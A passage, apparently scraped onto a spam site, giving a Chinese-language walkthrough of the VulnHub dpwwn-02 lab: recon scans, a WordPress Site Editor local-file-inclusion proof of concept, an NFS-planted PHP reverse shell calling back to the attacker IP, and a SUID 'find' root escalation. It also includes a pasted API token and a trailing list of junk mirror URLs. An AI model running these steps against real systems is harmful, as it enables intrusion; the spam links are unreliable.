网站找建站公司,企业网站网页尺寸,广州 网站建设公司,建设商务网站靶机下载地址#xff1a;https://download.vulnhub.com/dpwwn/dpwwn-02.zip
信息收集
ip add 查看kali Linux虚拟机的IP为#xff1a;10.10.10.128
https://vulnhub.com/entry/dpwwn-2,343/中查看靶机的信息#xff0c;IP固定为10.10.10.10
所以kali Linux添加仅主机网卡…靶机下载地址https://download.vulnhub.com/dpwwn/dpwwn-02.zip
信息收集
ip add 查看kali Linux虚拟机的IP为10.10.10.128
https://vulnhub.com/entry/dpwwn-2,343/中查看靶机的信息IP固定为10.10.10.10
所以kali Linux添加仅主机网卡设置网段为10.10.10.0/24靶机也设置网卡为仅主机同样的网段
虽然已知了靶机的IP为10.10.10.10但是可以使用命令进行扫描
netdiscover -i eth1 -r 10.10.10.0/24
netdiscover -i eth1 -r 10.10.10.0/24 是一条用来扫描局域网内活动设备的命令具体解释如下netdiscover这是一个网络发现工具用于扫描本地网络中的活跃设备显示其 IP 地址和 MAC 地址。它是通过 ARP 请求来发现设备的。-i eth1指定要使用的网络接口这里是 eth1通常指的是系统中的第二个以太网接口。如果你要在其他接口上扫描网络应该相应地替换为正确的接口名例如 eth0 或 wlan0。-r 10.10.10.0/24指定扫描的 IP 地址范围。10.10.10.0/24 表示扫描 10.10.10.0 到 10.10.10.255 这个网段内的所有 IP 地址即该子网内的所有设备。扫描其开放的端口和服务
nmap -sS -sV -A -T4 -p- 10.10.10.10
nmap -sS -sV -A -T4 -p- 10.10.10.10 是一条复杂的 nmap 扫描命令包含多个选项用于对目标 IP 地址 10.10.10.10 进行详细的扫描。下面是每个选项的解释1. -sSTCP SYN Scan
这是一个 SYN 扫描也叫 半开放扫描。nmap 会发送一个 SYN 包来初始化 TCP 连接然后根据目标主机的响应来判断端口的开放状态。
如果目标返回 SYN-ACK端口开放如果返回 RST端口关闭。
这种扫描方式不会完全建立连接因此较难被检测到。
2. -sVService Version Detection
启用 服务版本检测即除了扫描开放端口外nmap 还会尝试检测这些端口上运行的服务和软件的版本信息。这可以帮助你了解目标主机上运行的具体服务类型例如HTTP 服务器、FTP 服务器等及其版本。
3. -AAggressive Scan
这是一个 激进扫描它会启用多个高级功能包括
操作系统检测检测目标主机运行的操作系统。
版本检测类似于 -sV进一步检查服务的版本。
脚本扫描执行一些 NSENmap Scripting Engine脚本用于发现常见的漏洞或提供额外的信息。
Traceroute追踪到目标主机的网络路径。
总体上-A 提供了一个详细且全面的扫描但也会更加容易被目标检测到。
4. -T4Timing Template
设置 扫描的速度和精确度。-T4 表示使用一个相对较快的扫描速度但不至于太快以至于丢失大量数据。它通常用于在较短时间内完成扫描但会增加目标检测到扫描的概率。
-T0最慢、最隐蔽
-T5最快、最可能被检测到
5. -p-Scan All Ports
该选项让 nmap 扫描目标主机的 所有 65535 个端口从 1 到 65535。如果没有使用 -p 指定端口nmap 默认只扫描 1-1024 端口。
6. 10.10.10.10目标 IP
目标主机的 IP 地址。此命令会扫描 10.10.10.10 这个 IP 地址上的所有端口并进行详细分析。
总结
这条命令将对目标 IP 地址 10.10.10.10 执行以下操作执行 TCP SYN 扫描-sS来检查开放的端口。
检测目标主机上运行的 服务版本-sV。
进行 操作系统检测、脚本扫描、版本扫描 等高级操作-A。
设置较高的扫描速度-T4使得扫描更快速但仍然保持一定的隐蔽性。
扫描 所有 65535 个端口-p-。得到主要信息
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.38 ((Ubuntu))
|_http-title: dpwwn-02
|_http-server-header: Apache/2.4.38 (Ubuntu)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 45541/tcp mountd
| 100005 1,2,3 46796/udp mountd
| 100005 1,2,3 51765/tcp6 mountd
| 100005 1,2,3 58738/udp6 mountd
| 100021 1,3,4 34787/tcp nlockmgr
| 100021 1,3,4 38633/tcp6 nlockmgr
| 100021 1,3,4 46788/udp nlockmgr
| 100021 1,3,4 53610/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
443/tcp open http Apache httpd 2.4.38 ((Ubuntu))
|_http-server-header: Apache/2.4.38 (Ubuntu)
|_http-title: dpwwn-02
2049/tcp open nfs 3-4 (RPC #100003)
34787/tcp open nlockmgr 1-4 (RPC #100021)
44135/tcp open mountd 1-3 (RPC #100005)
45541/tcp open mountd 1-3 (RPC #100005)
50517/tcp open mountd 1-3 (RPC #100005)服务
rpcbind也叫 **portmap**它是一个用于 **远程过程调用RPC** 服务的绑定工具NFSNetwork File System是一种常见的网络文件共享协议允许在网络上的计算机之间共享文件夹和目录mountd(44135/tcp, 45541/tcp, 50517/tcp)**目标主机运行了多个 mountd 服务实例用于处理客户端的挂载请求。每个 mountd 服务都监听不同的端口。遍历子目录
dirb http://10.10.10.10
得到主要访问的URLhttp://10.10.10.10/wordpress/
没错得到了wordpress
使用wpscan扫描器进行扫描漏洞
wpscan -url http://10.10.10.10/wordpress
1. wpscan:
wpscan 是一个专门用于扫描和审计 WordPress 网站的工具常用于渗透测试和安全评估。
它可以帮助检测 WordPress 网站的漏洞、已安装的插件、主题、用户信息等安全相关信息。
2. -url:
-url 参数后面跟随的是要扫描的 WordPress 网站的 URL。你提供的 URL 是 http://10.10.10.10/wordpress这表示你要扫描的目标网站地址是 http://10.10.10.10/wordpress。
注意如果该 URL 是一个子目录wpscan 会从这个路径开始扫描。
3. http://10.10.10.10/wordpress:
这是目标 WordPress 网站的 URL10.10.10.10 是目标服务器的 IP 地址/wordpress 是 WordPress 安装所在的子目录。出现了错误 Scan Aborted: Unable to get https://data.wpscan.org/metadata.json.sha512 (Couldn’t resolve host name)
No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
需要api-token
这里直接上https://wpscan.com/register进行注册 我这里直接提供api-tokennLhs3sSQHXVFWSVykLmtKR5wLM3dqHKUysVtwQmX2t0
执行命令
wpscan --url http://10.10.10.10/wordpress/ --api-token nLhs3sSQHXVFWSVykLmtKR5wLM3dqHKUysVtwQmX2t0
得到漏洞本地文件包含 [!] Title: Site Editor 1.1.1 - Local File Inclusion (LFI)本地文件包含
本地文件包含Local File Inclusion, LFI漏洞是常见的Web安全问题通过它攻击者可以利用受漏洞影响的应用程序访问服务器上的文件。这里可以直接通过发送http请求获取文件漏洞利用
检索漏洞
根据得到的 [!] Title: Site Editor 1.1.1 - Local File Inclusion (LFI)信息得到
Site Editor应该是一个插件或是软件1.1.1是他的版本号
直接使用命令进行检索
searchsploit Site Editor 1.1.1
得到
\------------------------------------------------------------------ ---------------------------------Exploit Title | Path
------------------------------------------------------------------ ---------------------------------
Drupal Module CKEditor 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent | php/webapps/25493.txt
WordPress Plugin Site Editor 1.1.1 - Local File Inclusion | php/webapps/44340.txt继续检索
**searchsploit -m php/webapps/44340.txt **
cat 44340.txt
发现Poc
查看文本文件得到
** Proof of Concept **
http:///wp-content/plugins/siteeditor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?
ajax_path/etc/passwdPoCProof of Concept是漏洞利用的“概念验证”用于展示漏洞是否存在以及如何利用它。它通常是一个简化的例子表明漏洞的有效性这里的漏洞是 本地文件包含漏洞我们可以根据得到的Poc进行发送http请求得到我们想要的信息
利用Poc
curl http://10.10.10.10/wordpress/wp-content/plugins/siteeditor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path/etc/passwd
这样就可以成功访问到/etc/passwd文件由于之前我们看到了NFS服务我们可以在dpwwn的家目录下面写文件然后进行包含
查看靶机共享文件夹的路径
showmount --exports 10.10.10.10
挂载共享文件夹到kali
mkdir dpwwn02
mount -t nfs 10.10.10.10:/home/dpwwn02 --target dpwwn02
mount这是挂载命令用于将文件系统连接到本地的挂载点。-t nfs指定文件系统的类型为 NFS网络文件系统。NFS允许通过网络访问远程文件系统。10.10.10.10:/home/dpwwn0210.10.10.10 是远程服务器的IP地址。
/home/dpwwn02 是在该远程服务器上导出的NFS共享目录。
--target dpwwn02--target 参数等效于旧的 -o 或直接写挂载点指定本地系统上的挂载点。
dpwwn02 是本地路径表示将远程目录挂载到本地目录名为 dpwwn02 的地方例如 /mnt/dpwwn02 或当前工作目录中的 dpwwn02。df
显示文件系统的磁盘使用情况挂载点dpwwn02上创建shell.php文件
?php exec(/bin/bash -c bash -i /dev/tcp/10.10.10.128/4444 01);?获得shell
开启监听
nc -lvp 4444
使用curl发送http请求获取响应反弹shell
curl http:///wp-content/plugins/siteeditor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php? ajax_path/home/dpwwn02/shell.php
成功收到shell~ 权限是www-data权限
id
whoami
pwd
权限提升
检查特殊权限
find / -perm -us -type f 2/dev/null
find /:
find 命令从指定目录开始查找这里是根目录 /表示从整个文件系统中查找文件。-perm -us:
查找设置了 SUID 位的文件。SUIDSet User ID 是一种特殊权限允许普通用户以文件所有者的权限运行该程序。例如passwd 命令就需要以超级用户权限修改系统的 /etc/shadow 文件。
-type f:
仅查找文件类型为普通文件f 表示 file。2/dev/null:
将错误输出如权限不足导致的错误重定向到 /dev/null即忽略错误消息避免在查找过程中打印大量不必要的权限错误信息。发现了重要信息
find设置了suid
shell升级
find . -exec /bin/sh -p ; -quit
find .表示从当前目录 . 开始搜索文件或目录。
实际上这里并不需要找到具体的文件因为目标是利用 find 的执行功能。
-exec /bin/sh -p \;-execfind 的参数用于执行指定命令。
/bin/sh启动一个 shell这里选择了 sh。
-p这个参数让 sh 保留调用者的 SUID 权限。如果 find 被设置了 SUID 且以 root 所有者身份运行则这个 shell 将以 root 权限启动。
\;是 find 的语法用于标记 -exec 命令的结束。
-quit一旦找到一个结果find 将立即退出。
在这种情况下-quit 提高了效率因为目标是直接启动特权 shell而不是遍历所有文件。拿到root权限了
id
whoami
pwd
确认是root权限了
获得flag
cd /root
cat dpwwn-02-FLAG.txt
Congratulation! You PWN this dpwwn-02. Hope you enjoy this boot to root CTF.
Thank you. 46617323
24337873
4b4d6f6f
72643234
40323564
4e443462
36312a23
26724a6d
文章转载自: http://www.morning.lonlie.com.gov.cn.lonlie.com http://www.morning.jhyfb.cn.gov.cn.jhyfb.cn http://www.morning.wdlg.cn.gov.cn.wdlg.cn http://www.morning.lslin.com.gov.cn.lslin.com http://www.morning.dqwkm.cn.gov.cn.dqwkm.cn http://www.morning.cqyhdy.cn.gov.cn.cqyhdy.cn http://www.morning.qncqd.cn.gov.cn.qncqd.cn http://www.morning.nsrtvu.com.gov.cn.nsrtvu.com http://www.morning.hpggl.cn.gov.cn.hpggl.cn http://www.morning.lxjcr.cn.gov.cn.lxjcr.cn http://www.morning.c7513.cn.gov.cn.c7513.cn http://www.morning.ltpmy.cn.gov.cn.ltpmy.cn http://www.morning.pfntr.cn.gov.cn.pfntr.cn http://www.morning.qjghx.cn.gov.cn.qjghx.cn http://www.morning.wjplm.cn.gov.cn.wjplm.cn http://www.morning.trqzk.cn.gov.cn.trqzk.cn http://www.morning.lhxrn.cn.gov.cn.lhxrn.cn http://www.morning.rbcw.cn.gov.cn.rbcw.cn http://www.morning.xkjqg.cn.gov.cn.xkjqg.cn http://www.morning.0small.cn.gov.cn.0small.cn http://www.morning.yxnkr.cn.gov.cn.yxnkr.cn http://www.morning.pjyrl.cn.gov.cn.pjyrl.cn http://www.morning.jqkrt.cn.gov.cn.jqkrt.cn http://www.morning.rsfp.cn.gov.cn.rsfp.cn http://www.morning.tsycr.cn.gov.cn.tsycr.cn http://www.morning.qqnp.cn.gov.cn.qqnp.cn http://www.morning.hkgcx.cn.gov.cn.hkgcx.cn http://www.morning.fkgcd.cn.gov.cn.fkgcd.cn http://www.morning.jhswp.cn.gov.cn.jhswp.cn http://www.morning.tlfmr.cn.gov.cn.tlfmr.cn http://www.morning.zrks.cn.gov.cn.zrks.cn http://www.morning.tnthd.cn.gov.cn.tnthd.cn http://www.morning.jkdtz.cn.gov.cn.jkdtz.cn http://www.morning.chgmm.cn.gov.cn.chgmm.cn http://www.morning.dhdzz.cn.gov.cn.dhdzz.cn http://www.morning.cyhlq.cn.gov.cn.cyhlq.cn http://www.morning.rnmdp.cn.gov.cn.rnmdp.cn http://www.morning.cxsdl.cn.gov.cn.cxsdl.cn http://www.morning.hsdhr.cn.gov.cn.hsdhr.cn http://www.morning.dndk.cn.gov.cn.dndk.cn http://www.morning.rbjp.cn.gov.cn.rbjp.cn http://www.morning.mtbsd.cn.gov.cn.mtbsd.cn http://www.morning.ckfqt.cn.gov.cn.ckfqt.cn http://www.morning.pgmyn.cn.gov.cn.pgmyn.cn http://www.morning.lpmjr.cn.gov.cn.lpmjr.cn http://www.morning.jwxmn.cn.gov.cn.jwxmn.cn http://www.morning.zcsyz.cn.gov.cn.zcsyz.cn http://www.morning.rbsxf.cn.gov.cn.rbsxf.cn http://www.morning.rgnp.cn.gov.cn.rgnp.cn http://www.morning.nzmhk.cn.gov.cn.nzmhk.cn http://www.morning.gbrdx.cn.gov.cn.gbrdx.cn http://www.morning.buyid.com.cn.gov.cn.buyid.com.cn http://www.morning.sfrw.cn.gov.cn.sfrw.cn http://www.morning.bpkqd.cn.gov.cn.bpkqd.cn http://www.morning.qhmhz.cn.gov.cn.qhmhz.cn http://www.morning.kjyqr.cn.gov.cn.kjyqr.cn http://www.morning.mrpqg.cn.gov.cn.mrpqg.cn http://www.morning.rnlx.cn.gov.cn.rnlx.cn http://www.morning.rsjng.cn.gov.cn.rsjng.cn http://www.morning.kxmyj.cn.gov.cn.kxmyj.cn http://www.morning.kzbpx.cn.gov.cn.kzbpx.cn http://www.morning.ynbyk.cn.gov.cn.ynbyk.cn http://www.morning.dyzbt.cn.gov.cn.dyzbt.cn http://www.morning.jcyyh.cn.gov.cn.jcyyh.cn http://www.morning.bfwk.cn.gov.cn.bfwk.cn http://www.morning.lnnc.cn.gov.cn.lnnc.cn http://www.morning.xwlmg.cn.gov.cn.xwlmg.cn http://www.morning.wckrl.cn.gov.cn.wckrl.cn http://www.morning.qypjk.cn.gov.cn.qypjk.cn http://www.morning.ykmg.cn.gov.cn.ykmg.cn http://www.morning.flpjy.cn.gov.cn.flpjy.cn http://www.morning.zgdnd.cn.gov.cn.zgdnd.cn http://www.morning.rgxll.cn.gov.cn.rgxll.cn http://www.morning.nbdtdjk.cn.gov.cn.nbdtdjk.cn http://www.morning.rjynd.cn.gov.cn.rjynd.cn http://www.morning.mzydm.cn.gov.cn.mzydm.cn http://www.morning.wjqyt.cn.gov.cn.wjqyt.cn http://www.morning.yskhj.cn.gov.cn.yskhj.cn http://www.morning.nmnhs.cn.gov.cn.nmnhs.cn http://www.morning.ygbq.cn.gov.cn.ygbq.cn
